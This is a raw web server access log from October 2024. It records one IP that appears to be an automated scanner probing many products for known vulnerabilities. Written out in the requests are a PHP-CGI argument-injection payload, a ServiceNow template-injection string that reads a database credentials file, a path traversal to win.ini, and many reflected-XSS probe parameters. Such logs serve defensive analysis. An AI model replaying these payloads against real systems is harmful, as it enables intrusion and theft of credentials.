195.164.49.69 - - [20/Oct/2024:14:59:52 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:14:59:53 +0000] POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:14:59:53 +0000] POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:14:59:57 +0000] GET /api/v2/cmdb/system/admin HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:14:59:58 +0000] PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:00:00 +0000] POST /aspera/faspex/package_relay/relay_package HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:00:01 +0000] POST /goanywhere/lic/accept HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:00:02 +0000] POST /index.php?c=blocked&action=continue HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:00:04 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:15:00:05 +0000] GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2nhrXPWdPCePdoH1aID377atOiT HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:00:06 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:15:00:07 +0000] POST /setup/setupadministrator.action HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:00:08 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:00:09 +0000] GET /welcome.action HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:00:11 +0000] POST /api/2.0/mlflow/registered-models/create HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:15:00:12 +0000] POST /api/2.0/mlflow/model-versions/create HTTP/1.1 404 1126
83.212.98.101 - - [20/Oct/2024:15:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:15:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
77.87.163.227 - - [20/Oct/2024:15:04:09 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [20/Oct/2024:15:04:29 +0000] GET /app?service=page/SetupCompleted HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:04:30 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:04:31 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:04:32 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:04:33 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:04:34 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:04:35 +0000] GET /app?service=page/PrinterList HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:04:49 +0000] DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:04:50 +0000] POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:15:04:51 +0000] GET /WebInterface HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:04:52 +0000] GET /api/server/version HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:05:05 +0000] POST /webtools/control/xmlrpc?USERNAME&PASSWORD=2nhrXNbvZqTdJxbEczirPtinZZk&requirePasswordChange=Y HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:05:06 +0000] GET /api/clusters HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:05:09 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:15:05:10 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:05:11 +0000] GET /xyz/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:15:05:15 +0000] POST /dana-na/auth/saml-sso.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:05:18 +0000] POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:15:05:19 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:15:05:20 +0000] GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 200 11204
- - - [20/Oct/2024:15:05:21 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:05:23 +0000] GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:05:26 +0000] GET /en-US/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:05:28 +0000] POST /Startup/Register HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:05:29 +0000] POST /Token HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:05:40 +0000] POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:05:41 +0000] POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:05:42 +0000] POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:05:43 +0000] POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:05:45 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
83.212.98.101 - - [20/Oct/2024:15:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:05:46 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:15:05:47 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:15:05:48 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:15:05:49 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:05:51 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:05:51 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:05:51 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:05:52 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:05:52 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:05:52 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:05:52 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:05:52 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:05:52 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:05:52 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:05:52 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:05:52 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:05:53 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:05:53 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:05:53 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:05:53 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:06:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:17 +0000] GET /?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:17 +0000] GET /?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:17 +0000] GET /?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:17 +0000] GET /?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:17 +0000] GET /?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:17 +0000] GET /?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:17 +0000] GET /?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:17 +0000] GET /?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:18 +0000] GET /?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:18 +0000] GET /?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:18 +0000] GET /?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:18 +0000] GET /?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:18 +0000] GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:18 +0000] GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:18 +0000] GET /?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E HTTP/1.1 200 11204
